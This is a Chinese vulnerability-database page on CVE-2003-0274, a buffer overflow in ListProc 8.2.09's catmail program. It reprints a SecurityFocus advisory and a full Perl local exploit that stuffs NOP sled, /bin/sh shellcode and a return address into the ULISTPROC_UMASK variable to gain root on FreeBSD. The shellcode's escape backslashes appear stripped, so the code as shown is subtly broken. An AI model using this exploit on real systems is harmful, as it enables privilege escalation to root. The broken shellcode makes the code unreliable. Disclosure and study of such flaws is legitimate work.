ListProc缓冲区溢出漏洞

ListProc缓冲区溢出漏洞

漏洞ID 1107309 漏洞类型 缓冲区溢出
发布时间 2003-05-08 更新时间 2003-05-27
图片[1]-ListProc缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0274
图片[2]-ListProc缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200305-069
漏洞平台 FreeBSD CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22573
https://www.securityfocus.com/bid/82820
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-069
|漏洞详情
ListProc8.2.09及其早期版本中的catmail存在缓冲区溢出漏洞。远程攻击者可以通过超长ULISTPROC_UMASK值执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/7533/info

ListProc catmail has been reported prone to a buffer overflow vulnerability when handling a ULISTPROC_UMASK environment variable of excessive length.

The issue is likely due to a lack of sufficient bounds checking performed when copying the contents of the ULISTPROC_UMASK environment variable into an internal memory buffer.

Ultimately an attacker may exploit this vulnerability to execute arbitrary operation codes. Code execution would occur in the context of the ListProc catmail application, typically root.

It should be noted that while his vulnerability has been reported to affect ListProc 8.2.09, other versions might also be affected. 

#!/usr/bin/perl -w
# DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
# as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
# offset, retaddr and shellcode is for my FreeBSD 4.8-RELEASE, YMMV
# shellcode by eSDee, hello there eSDee
# dont forget to edit the path to the catmail binary
# this yields uid(0) if listproc is installed by root, otherwise something else

$len = 16534;
$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. � eye)
$nop = "x90";                                        
$shellcode =    "x31xc0x50x50xb0x17xcdx80x31xc0x50x68".
                "x2fx2fx73x68x68x2fx62x69x6ex89xe3x50".
                "x54x53x50xb0x3bxcdx80x31xc0xb0x01xcdx80";
                                                      
for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
    $buffer .= $nop;                                  
}                                                     
$buffer .= $shellcode;                                
$buffer .= $ret x 2;                                  
local($ENV{'ULISTPROC_UMASK'}) = $buffer;             
system("catmail");
|受影响的产品
CREN ListProc 8.2.9
|参考资料

来源:BUGTRAQ
名称:20030508SRT2003-05-08-1137-ListProcmailinglistULISTPROC_UMASKoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105241224228693&w;=2

相关推荐: Epic Games Unreal Engine Unreal URL Directory Traversal Vulnerability

Epic Games Unreal Engine Unreal URL Directory Traversal Vulnerability 漏洞ID 1100802 漏洞类型 Input Validation Error 发布时间 2003-02-05 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享